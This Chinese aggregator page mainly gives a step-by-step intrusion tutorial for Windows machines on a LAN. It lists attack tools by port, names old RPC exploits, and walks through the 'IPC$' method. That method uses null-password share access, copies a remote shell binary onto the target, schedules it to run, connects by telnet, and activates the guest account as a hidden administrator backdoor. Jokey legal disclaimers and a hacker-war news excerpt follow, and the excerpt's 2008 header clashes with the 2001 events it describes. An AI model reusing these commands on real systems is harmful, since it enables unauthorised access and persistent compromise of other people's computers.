本文目录一览:
- 1、局域网内网入侵
- 2、如何入侵指定网站?
- 3、有一段很强大的无责任声明
- 4、2008年中美黑客大战是怎么回事
局域网内网入侵
我查拉135端口端口说明:135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。
端口漏洞:相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒,该病毒就是利用RPC漏洞来攻击计算机的。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。该漏洞会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。
1:用139端口入侵
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET命令,下面就是这两个命令的使用方法
NET VIEW?
作 用:显示域列表、计算机列表或指定计算机的共享资源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
参数介绍:?
1键入不带参数的net view显示当前域的计算机列表。?
2\\computername 指定要查看其共享资源的计算机。?
3/domain[:domainname]指定要查看其可用计算机的域?
NET USE?
作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
参数介绍:?
键入不带参数的net use列出网络连接。?
devicename指定要连接到的资源名称或要断开的设备名称。?
\\computername\sharename服务器及共享资源的名称。?
password访问共享资源的密码。?
*提示键入密码。 /user指定进行连接的另外一个用户。?
domainname指定另一个域。?
username指定登录的用户名。?
/home将用户连接到其宿主目录?
/delete取消指定网络连接。?
/persistent控制永久网络连接的使用。?
C:\net use \\IP
C:\net view \\IP
我们已经看到对方共享了他的C,D,E三个盘
我们要做的是使用NBTSTAT命令载入NBT快取.
c:\nbtstat –R 载入NBT快取
c:\nbtstat –c 看有无载入NBT快取
现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。
2:4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3:80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
4:serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
5: 554端口
用real554.exe入侵。
6:6129端口
用DameWare6129.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连
接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名
,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的
c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备
开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的
是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打
算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这
个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使
用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作
一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我
们可以用guest再次访问这台计算机)
各个端口的入侵.%20k=5lalaaid=B0100019074
不算太复杂的!
如何入侵指定网站?
分几个层次吧,由下到上是底层操作系统、应用服务器、应用程序;
1、操作系统 有什么漏洞,哪些是可以利用的帮学校检测下哦,系统上的常用软件也可以关注
2、应用服务器也是一样呢,apache,IIS,nginx都是不断有漏洞爆出,要去关注
3、应用程序,就要看他是用的具体什么程序,什么语言,要学的也很多啦。
我不是黑客,这只是你要学习的一个知识架构吧,装下AC中间的
有一段很强大的无责任声明
1、原始版
以上内容完全是复制粘贴,本人并不明白其意思,故本人不对以上内容负法律责任,请不要跨省追捕。要详查请自己联系原作者,谢谢
2、巧合版
——“以上内容完全是复制粘贴,本人并不明白其意思,故本人不对以上内容负法律责任,请不要跨省追捕。要详查请自己联系原作者,谢谢!”。
本故事纯属虚构,如有雷同实属巧合。
3、双盲版
本人是电脑盲,完全不知道什么叫复制粘贴,现在也不清楚自己如何把这些内容传上了网络;同时,本人是文盲,并不明白上文的意思,故本人不对以上内容负法律责任,请不要跨省追捕。要详查请自己联系原作者,谢谢!
4、多法律版
以上内容虽然看了,但没看懂,也不想看懂, 鉴于本人水平有限,声明如下:
跟帖行为并不意味本人同意、支持、默认,反对,或了解、知晓文中观点,如有任何疑问请直接联系原作者本人。故本人不对以上和楼下的任何内容负法律责任(包括宪法,民法、刑法,公检法,各地治安条例,或婚姻法,及文中涉及或可能涉及以及未涉及之法律)。
请不要跨省追捕本人。追捕请与原作者联系。
5、黑客版
首先声明:本人不知道顶贴的任何含义,谢绝任何单位就顶贴行为进行任何以执法或其它任何名义为借口的对本人的骚扰行为。
近期,因言(文)获罪并被跨省追捕的事件时有发生,本人因此小心谨慎,噤若寒蝉地写贴!所有线索及引用,均来自网络。如论坛编辑和版主发现有问题,请及时站内联系并删除,以对笔者和论坛进行保护,如果因不及时删帖而引起的法律纠纷本人概不负责。看帖者也请于24小时内自觉、主动、完全忘记。
跟帖行为并不意味本人同意、支持、反对,或了解、知晓文中观点,如有任何疑问请直接联系原作者本人。故本人不对以上内容负法律责任(包括民法、刑法或婚姻法,及文中提及或未提及之法律)。
另:最近电脑黑客肆虐,因此回复内容可能为黑客发出,而非本人真实意思表示,谢绝跨省追捕,如拟了解详情,请直接与计算机黑客联系。谢谢。
6、火星版
本帖为本计算机上火星人入侵识别程序自动发出!
因近日屡有火星人入侵M国通信卫星,然后再通过N重代理入侵本人计算机后,继而使用本计算机乱发帖子。为了撇清关系,本人暗中安装了火星人入侵识别程序,在每个火星人发的帖子后附加此声明。
若要追查,请与火星人联系。
请不要跨省追捕本人。追捕请与原作者联系。
7、随机版
以上内容完全为复制粘贴,复制或引用此内容完全是随机行为:随机复制,随机引用。所有信息及引用,均来自网络,虽然本人已阅,但因鄙人识见浅陋,仍未得其义。
本人并不明白这些名词所指代的内容,也不明白动词的意义,也不明白形容词的含义,更不明白外汉词拼音及英文的意思。
本人以有限水平,声明如下:本人与作者素不相识,亦无利益之关联。跟帖行为仅为本人混迹论坛品德良好之表现,并不意味本人默认、同意、赞成、支持、拥护或反对文中观点。本人不对以上内容负任何责任,请勿跨省追捕,如欲详查请自行联系原作者。如论坛编辑或版主发现此回贴有违法违规嫌疑,请及时删除,以对论坛及笔者进行保护,如因不及时删帖而引起法律纠纷,恕本人概不负责。本人言行一致,绝无腹诽。此致!
8、赚分版
郑重声明:本人只是路过看到此贴,为挣几个积分回了此贴,请D和政府不要绝跨省追捕俺,俺因为身体原因经受不起俯卧撑,躲猫猫,活动腿.....等等非人道折磨,俺天生胆小,祈求D和ZF宽大为怀,放俺一马,俺一定会在今后的悠悠岁月中感谢你们“八辈祖宗”!谢谢哦!
类似的有:郑重声明-----我就是顶帖的,发生什么事都不关我事。请不要跨省抓捕浪费钱。谢谢
9、智商奇低版
声明: 因本人智商奇低近似白痴,完全不明白以下文字的意思,如果涉及到了攻击你的内容, 请直接找原网站或者缉捕原作者,切莫查本人IP派警察来抓本人,谢谢!
10、拉楼主下水版
以上是从主贴中摘下复制的。。。不是本人跟帖。。。。有问题,找楼主。。。谢谢!(抱歉,将楼主给扯进来实属无奈,理解!)
11、高深版
郑重提醒:
本次回帖源于二进制的组合(包括但不限于有序、无序、有无序、无有序各种任意组合等等),鉴于二进制发现源于18世纪德国数理哲学大师莱布尼兹,或者发明源于《易经》,本回帖的可能存在的版权、责任、义务等等必然、必须归集于莱布尼兹或者《易经》(连带《易经》的作者或整理者)。
本次回帖源于国际互联网,传播于国际互联网,鉴于国际互联网发明源于博纳斯-李被,或者建立在美国国防部研究计划署制定的协定基础上,本回帖的可能存在的储存、改编、传播等等必然、必须归责于博纳斯-李被或者美国国防部研究计划署以及各硬件制造商等等。
本次回帖再现于软件(包括但不限于dos、windows、unix等等),鉴于相关软件开发于相应公司、个人,本回帖对阅读者的各种可能显示必然、必须归责于dos、windows、unix以及各相关软件开发公司、个人等等。
本次回帖被你阅读、观看、了解、注意,鉴于你的教育背景、道德水准、阶级地位以及是否拿钱发帖、拿钱回贴、拿钱举报贴,你的任何解读都是你内心本质的映照,你对本帖的任何解读必须归责于你的动机、你的出身、你受教育的学校、你的工作单位以及各相关与你有接触的任何人、动物、植物等等。
其他未规定情形,责任归责于你:阅读者本人,因为你看了此帖
12、健康证明版
以上内容完全是复制粘贴,所有线索及引用,均来自网络,本人并不明白其意思,跟帖行为并不意味本人同意、支持、反对,或了解、知晓文中观点。故本人不对以上内容负法律责任(包括民法、刑法或婚姻法及文中提及或未提及之法)。请不要跨省追捕。要详查请自己联系原作者。如论坛编辑和版主发现此回贴有违法嫌疑,请及时删除此帖,以对笔者和论坛进行保护,如果因不及时删帖而引起的法律纠纷本人概不负责。谢谢
另:本人持有居住地三级甲等医院心血管科,心胸外科,精神科,神经内科,神经外科,遗传学科所出具有法律效力之健康证明,可证明本人无心脏病史及家族病史,无做噩梦病史及家族病史.同时还持有由本人幼儿院老师,院长,院党委书记,小中大学班主任,校长,校党委书记以及数十亲友共同签字证词,可证明本人素无参与或企图参与躲猫猫,弹脑门及任何可能危害生命健康的不良游戏之意向
13、条理版
---声明:
1.本人过去、现在以及将来都不认识楼主,且自古以来与楼主无利益关系。以上内容文字均不不懂是什么意思。
2.本人过去、现在以及将来都没有或者不准备去杭州,也与该市无贸易往来。楼主表述之事与本人无关,只是本着“看贴回贴,繁荣网络、利人利己”的原则,顺便赚3分。
3. 本人在此留言均为网络上复制,用于检验本人电脑键盘录入、屏幕显示的机械、光电性能。并不代表本人局部或全部同意、支持或者反对楼主观点。
4.人生有风险,入世需谨慎。本回贴不暗示、鼓励、支持或映射读者作出生活方式、工作态度、婚姻交友、子女教育的积极或消极判断。
5. 如本人留言违反国家有关法律,请网络管理员及时删除本人跟贴。
6. 因删贴不及时所产生的任何法律(包括宪法,加法、减法、乘法、除法、剑法、拳法、脚法、民法,刑法,书法,公检法,基本法,劳动法,婚姻法,输入法,没办法,国际法,今日说法,吸星大法,与台湾关系法及文中涉及或可能涉及以及未涉及之法,各地治安管理条例)纠纷或责任本人概不负责。
7. 本人谢绝任何跨省追捕行为,如有需要请直接联系楼主、原作者以及网络管理员或法人代表。
8. 此声明最终解释权归本人所有
类似的有
(1)本人旨在为广大网民回复更多的留言,其服务是无偿的;本人不保证向网友回复的言语的准确性和完整性,本人对其合法性亦概不负责,亦不承担任何法律责任,本人回复所有内容亦不表明本人之观点或意见。
(2) 本人中的回复(包括转贴回复)的版权仅归原作者所有,若作者有版权声明的或文章从其它网站转载而附带有原所有站的版权声明者,其版权归属以附带声明为准;文章仅代表作者本人的观点,与本人立场无关;
(3) 本人所回复的内容为网络提供,内容的真实性、准确性和合法性由国际互联网负责,本人对此不承担任何保证责任。
(4) 任何单位或个人认为本人回复内容可能涉嫌侵犯其合法权益,应该及时向本人书面反馈,并提供身份证明、权属证明及详细侵权情况证明,本人在收到上述法律文件后,将会尽快移除被控侵权内容。
(5)凡以任何方式联系本人或直接、间接使用本人回复者,视为自愿接受本人声明的约束
(6)本人如因系统维护或升级而需暂停服务时,将事先公告。若因线路及非本人控制范围外的硬件故障或其它不可抗力而导致暂停回复,于暂停回复期间造成的一切不便与损失,本人不负任何责任。
(2) 任何由于计算机2000年问题、黑客攻击、计算机病毒侵入或发作、因政府管制而造成的暂时性关闭等影响网络正常经营的不可抗力而造成的法律责任问题,本人均得免责。
类似还有
1.本人是文盲,以上内容文字均不认识,也看不懂是什么意思.
2.此事与本人一点关系都没有,只是本着“看贴(虽然看不懂)回贴,利人利己的中华民族优秀传统美德”,顺便赚3个工分
3. 本人在此留言均为网络上复制,并不代表本人同意、支持或者反对楼主观点。
4. 如本人留言违反国家有关法律,请网络管理员及时删除本人跟贴。
5. 因删贴不及时所产生的任何法律(包括宪法,民法,刑法,书法,公检法,基本法,劳动法,婚姻法,输入法,没办法,国际法,今日说法,吸星大法,与台湾关系法及文中涉及或可能涉及以及未涉及之法,各地治安管理条例)纠纷或责任本人概不负责。
6. 本人谢绝任何跨省追捕行为,如有需要请直接联系楼主、原作者以及网络管理员或法人代表。
7. 此声明最终解释权归本人所有。
14、失忆版
本人郑重声明:
本次回帖之所有内容(包括但不限于汉字、拼音、外文字母、单词、句子、图片、影像、录音,以及前述之各种任意组合等等)完全是复制粘贴,来源于国际互联网,
本人并不明白其全部或部分之意思(包括但不限于对所复制粘贴之内容的识别、阅读、理解、分析、记忆等等),故本人不对以上及本内容负任何法律责任(包括但不限于刑事、民事责任)及其他潜在责任与义务(包括但不限于相关国家已存在、正在形成、未来将形成之的法律法规之责任),
请不要跨省追捕(包括但不限于省级市级州级县级镇级乡级村级行政机关、企事业单位、司法机关、立法机关等等任何机构、单位、组织及该机构、单位和组织中的任何个人)。
要详查请亲自直接联系原作者,
同时,所有观看本帖者请于观看24小时内自觉、主动忘记,本人不对未能忘记者未来将发生的任何问题与后果负责。感谢!
15、中英文版
本人郑重声明:
本次回帖之所有内容(包括但不限于汉字、拼音、外文字母、单词、句子、图片、影像、录音,以及前述之各种任意组合等等)完全是复制粘贴,来源于国际互联网,
本人并不明白其全部或部分之意思(包括但不限于对所复制粘贴之内容的识别、阅读、理解、分析、记忆等等),故本人不对以上及本内容负任何法律责任(包括但不限于刑事、民事责任)及其他潜在责任与义务(包括但不限于相关国家已存在、正在形成、未来将形成之的法律法规之责任),
请不要跨省追捕(包括但不限于省级市级州级县级镇级乡级村级行政机关、企事业单位、司法机关、立法机关等等任何机构、单位、组织及该机构、单位和组织中的任何个人)。
要详查请亲自直接联系原作者,
同时,所有观看本帖者请于观看24小时内自觉、主动忘记,本人不对未能忘记者未来将发生的任何问题与后果负责。感谢!
I solemnly declare:
The replies of all content (including but not limited to Chinese characters, Pinyin, foreign letters, words, sentences, pictures, images, sound recordings, as well as any combination of the aforementioned variety, etc.) is to copy and paste, Comes from the Internet, I do not understand all or part of its meaning (including but not limited to, copy and paste the contents of the identification, reading, understanding, analysis, memory, etc.), Therefore, I do not and the content of the above bear any liability (including but not limited to criminal and civil liability) and other potential liabilities and obligations (including but not limited to the countries already exists, is taking shape, the formation of the future will be the responsibility of the laws and regulations) , Please do not chase provinces (including but not limited to the provincial level state-level municipal township of village-level administrative organs, enterprises, institutions, judiciary, legislature, etc. any organization, units, organizations and the agencies, units and any individual organization). To detailed investigation of a direct link to original author, please, At the same time, all are invited to watch this with 24 hours of watching and consciously take the initiative to forget that I can not forget those who do not will be any future problems and consequences. Thank you!
The above content completely copy and paste, myself do not understand its meaning, therefore myself do not take the legal liability to above content, please do not want the cross-province to capture. Must sift asks itself to contact with the original author, thanks!
-----------------------------------------------------
水无乃问这干嘛??
2008年中美黑客大战是怎么回事
中国北京时间5月9日消息,近日与美国黑客展开“网络大战”的中国黑客5月9日表示他们已将1000家美国网站的页面进行了修改,不过中国黑客主动呼吁结束这场“网络战争”,与美国黑客“停战”。 中国“红客联盟”在网站上发表声明称,该组织已攻击了1000家美国网站,他们的目标已经实现。声明称:“从现在开始再发生的黑客攻击事件将与红客联盟无关。” 自4月1日美国侦察机撞毁中方军机事件发生后,美国黑客向中国网站发动了进攻,数百家中国网站遭到入侵,美国黑客还在这些网站上留下了攻击中国的语句。由中国黑客组成的非正式黑客组织“中国红客联盟”于5月1日宣布将向美国网站发动反击。 随着双方网络大战的开始,更多的美国和中国网站都遭到了攻击,其中一些网站不得不暂时停止运营。在这期间,两家负责纪录网站被攻击情况的国际性安全公司表示,自4月1日以来有近千家以“.cn”结尾的网站遭到了入侵。同时,至少十几家非常知名的美国网站也遭到了显然是来自中国的黑客的攻击,这些黑客在美国网站上留下话称:“禁止向台湾出售武器,台湾是中国不可分割的一部分。” 位于北京的网络安全公司管理人员表示,除非网络管理员时刻注意增强服务器的安全防范能力,否则很多网站都极容易遭到黑客攻击。该管理人员说,大多数黑客攻击均是通过一系列防范能力不强的服务器作为跳板完成的。 中国红客联盟也在声明中呼吁增强中国网站的安全性,并表示遭到美国黑客入侵的中国网站大多是小型网站。声明称:“网络大战的有利之处在于使中国网站注意到了网络安全的重要性,现在越来越多的网站会认真对待网络安全问题。”摘自新浪